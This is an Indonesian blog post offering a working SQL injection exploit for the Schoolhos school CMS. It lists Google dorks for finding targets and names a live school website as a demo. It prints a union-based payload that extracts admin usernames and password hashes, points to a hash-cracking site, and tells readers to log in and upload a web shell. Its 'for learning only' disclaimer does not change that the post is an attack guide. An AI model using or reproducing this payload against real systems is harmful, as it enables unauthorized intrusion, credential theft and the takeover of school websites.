Exploit CMS Schoolhost [Payload Sql Injection]


Assalamualaikum.
Kali ini kami akan share Exploit CMS Schoolhost. oiya sebelumnya ini exploit lama namun masih banyak website-website yang menggunakan CMS ini termasuk website Sekolahan sch.id.




Email Support Schoolhos : support@schoolhos.com

Fan Page Schoolhos : Schoolhos Facebook

Twitter Schoolhos : Schoolhos Twitter

Situs Resmi Schoolhos : Official Schoolhos



okeh langsung saja ke Proof Of Concept nya hehehh :
disni saya akan menggunakan Parameter SQL pada website tersebut.

silakan cari target dengan Dork berikut :


 inurl:/?p=siswa 
inurl:/?p=berita
intext:"Schoolhos Free Open Source CMS"
inurl:/?p=galeri





Dork bisa kalian kembangkan lagi biar "NTAPS".

Live Demo :
http://www.man2gresik.sch.id/?p=detberita&id=74

Exploitnya :  

' and @x:=concat/**_**/((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers,0x203a3a20,0x496e6a6563746564206279204d756a61686964696e2043796265722041726d79))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+





taarrraaaa, user dan password nya sudah kita dapat, tinggal hash passwordnya di

 https://hashkiller.co.uk .


silakan login  

http://victim.com/adminpanel



bila sukses silakan di upload shell ke sayangan kalian.

NB: Berhubung yang kita bahas website pendidikan diharapkan tidak menebas indexnya... :)
apa yang dibahas kali ini adalah untuk pembelajaran semata.
sekian dan terimaksih wassalam.
Exploit CMS Schoolhost [Payload Sql Injection] Exploit CMS Schoolhost [Payload Sql Injection] Reviewed by Izza009 on 17.53 Rating: 5

Tidak ada komentar:

Diberdayakan oleh Blogger.